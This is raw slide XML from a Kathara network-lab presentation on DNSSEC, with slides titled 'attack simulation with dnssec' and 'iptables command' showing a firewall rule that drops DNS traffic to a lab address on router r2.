                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lstart</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{323CD645-B655-0E77-1F70-CA8D912E3A38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2378845"/>
              <a:ext cx="10972800" cy="289449"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="25400" algn="l" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="32000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF288531-C8B1-DE40-A68D-18C3DEC5296E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A833EC70-35E8-9830-1F48-9F67336E57C8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8548205" y="2116065"/>
                <a:ext cx="126000" cy="126000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="50196"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="4472C4">
                    <a:shade val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAF1D0A2-87B2-A717-0188-E07C1C922682}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8092857" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CACF6AC1-ED75-9963-3E50-6E60C28ECF59}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8320531" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427588724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72ABEE-2F81-7303-F49D-41F081722AAA}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5122" name="Rectangle 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FE46F0B-E660-3492-A85C-6F1D7AFFC56F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attack simulation with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Subtitle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F5A03AA-68BF-918B-7D3E-D88B4869A7DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0251C8F-6025-EE4F-2502-C129383D1684}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E206F36A-2489-09DA-D4E4-2994C8D4D6A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218328643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7CEA8D-BB13-0732-E3A4-197742DC1C70}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Titolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2917944-B2C4-25D4-5C1D-FD0663211E6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iptables command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CC64C4C-F393-96F3-6238-9F874F7AE2DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>on r2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>block incoming DNS traffic in r2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>look at eth and loopback interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5869CAF-6552-2D69-8FB6-2B490B6EFA9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BCBBA97-ECA6-E877-D834-EF6CBB824ED6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1921F717-00CB-70B8-D732-C3893F9A1182}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2217485" y="3133725"/>
            <a:ext cx="7757030" cy="2697167"/>
            <a:chOff x="4014773" y="2378845"/>
            <a:chExt cx="7565509" cy="2825300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD08C6FE-B499-342F-B3D7-8ABDA50FF447}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014776" y="2632080"/>
              <a:ext cx="7565506" cy="2572065"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="t"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@r2:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>tables –A FORWARD –d 110.0.0.10 –p </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> --</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 53 –j DROP</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{968AA842-DC54-6390-8193-9121FBC857C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014773" y="2378845"/>
              <a:ext cx="7565506" cy="286249"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="25400" algn="l" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="32000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" kern="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:rPr>
                <a:t>r2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82AA5D9E-ACB0-BFB3-1E84-0FF99503DF8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1E07AAB-76C2-F569-0EE9-7DE9367FEB98}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8548205" y="2116065"/>
                <a:ext cx="126000" cy="126000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="50196"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="4472C4">
                    <a:shade val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28433CED-8AA4-8C17-C73C-363A0ED6A55C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8092857" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4DE48A9-68F2-4683-1021-DD817ABAB078}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8320531" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282454148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AAE8E5-B6FA-3E5C-0D4F-8DFEDF74248E}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Titolo 1">
